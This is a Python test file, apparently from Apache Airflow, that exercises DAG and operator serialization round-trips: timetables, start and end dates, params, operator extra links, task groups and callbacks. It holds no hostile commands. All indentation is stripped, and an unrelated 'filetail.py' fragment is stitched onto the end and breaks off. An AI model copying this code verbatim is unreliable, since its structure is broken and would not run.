# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
@pytest.mark.parametrize(
"timetable",
[cron_timetable("0 0 * * *"), CustomSerializationTimetable("foo")],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_roundtrip_from_timetable(self, timetable):
"""Verify a timetable-backed serialization can be deserialized."""
dag = get_timetable_based_simple_dag(timetable)
roundtripped = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(roundtripped, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually.
'timetable',
'timezone',
# Need to check fields in it, to exclude functions.
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timetable.summary == dag.timetable.summary
assert serialized_dag.timetable.serialize() == dag.timetable.serialize()
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_ext',
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_ext) == set(task.template_ext)
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for a deserialized task, task.subdag is None for every operator
# except SubDagOperator, where task.subdag is an instance of DAG
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@pytest.mark.parametrize(
"dag_start_date, task_start_date, expected_task_start_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
],
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
"dag_end_date, task_end_date, expected_task_end_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
],
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@pytest.mark.parametrize(
"serialized_timetable, expected_timetable",
[
({"__type": "airflow.timetables.simple.NullTimetable", "__var": {}}, NullTimetable()),
(
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "@weekly", "timezone": "UTC"},
},
cron_timetable("0 0 * * 0"),
),
({"__type": "airflow.timetables.simple.OnceTimetable", "__var": {}}, OnceTimetable()),
(
{
"__type": "airflow.timetables.interval.DeltaDataIntervalTimetable",
"__var": {"delta": 86400.0},
},
delta_timetable(timedelta(days=1)),
),
(CUSTOM_TIMETABLE_SERIALIZED, CustomSerializationTimetable("foo")),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_deserialization_timetable(
self,
serialized_timetable,
expected_timetable,
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": serialized_timetable,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
def test_deserialization_timetable_unregistered(self):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": CUSTOM_TIMETABLE_SERIALIZED,
},
}
SerializedDAG.validate_schema(serialized)
with pytest.raises(ValueError) as ctx:
SerializedDAG.from_dict(serialized)
message = (
"Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
@pytest.mark.parametrize(
"serialized_schedule_interval, expected_timetable",
[
(None, NullTimetable()),
("@weekly", cron_timetable("0 0 * * 0")),
("@once", OnceTimetable()),
(
{"__type": "timedelta", "__var": 86400.0},
delta_timetable(timedelta(days=1)),
),
],
)
def test_deserialization_schedule_interval(
self,
serialized_schedule_interval,
expected_timetable,
):
"""Test DAGs serialized before 2.2 can be correctly deserialized."""
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
@pytest.mark.parametrize(
"val, expected",
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
],
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]
else:
assert "params" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params
assert expected_val == deserialized_simple_task.params
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py
The test verifies that if extra operator links are registered in the plugin
via ``operator_extra_links`` and the same link is also defined on
the Operator via ``BaseOperator.operator_extra_links``, the operator ends up with the
correct extra link.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
XCom.set(
key='search_query',
value="dummy_value_1",
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self, caplog):
"""
Assert that for an OperatorLink that is neither registered via Plugins nor an inbuilt Operator Link,
the DAG can still be deserialized (does not error) but an error is logged
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with caplog.at_level("ERROR", logger="airflow.serialization.serialized_objects"):
SerializedDAG.from_dict(serialized_dag)
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' not registered"
)
assert expected_err_msg in caplog.text
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py
The test verifies that if extra operator links are registered in the plugin
via ``operator_extra_links`` and the same link is also defined on
the Operator via ``BaseOperator.operator_extra_links``, the operator ends up with the
correct extra link.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
XCom.set(
key='search_query',
value=["dummy_value_1", "dummy_value_2"],
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@pytest.mark.parametrize(
"templated_field, expected_field",
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
],
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses an RCE/security risk etc.)
we want to check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization need to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
}
keys_for_backwards_compat: set = {
"_concurrency",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that no new fields have been added to BaseOperator, and serves as a
reminder that tests should be added for any that are.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'_pre_execute_hook': None,
'_post_execute_hook': None,
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_active_tis_per_dag': None,
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
Tests serialize_operator, making sure the deps are in a deterministic (sorted) order
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
Tests serialize_task_group, making sure the lists are in a deterministic (sorted) order
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@pytest.mark.parametrize(
"mode, expect_custom_deps",
[
("poke", False),
("reschedule", True),
],
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@pytest.mark.parametrize(
"passed_success_callback, expected_value",
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in the serialized JSON blob, and that on de-serialization dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in the serialized blob
and so defaults to False on de-serialization.
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@pytest.mark.parametrize(
"passed_failure_callback, expected_value",
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in the serialized JSON blob, and that on de-serialization dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in the serialized blob
and so defaults to False on de-serialization.
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@pytest.mark.parametrize(
"object_to_serialized, expected_output",
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
],
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
filetail.py
|
from multiprocessing import Process
import tailer
class FileTail:
"""A simple example class"""
def __init__(self, log_fpath):
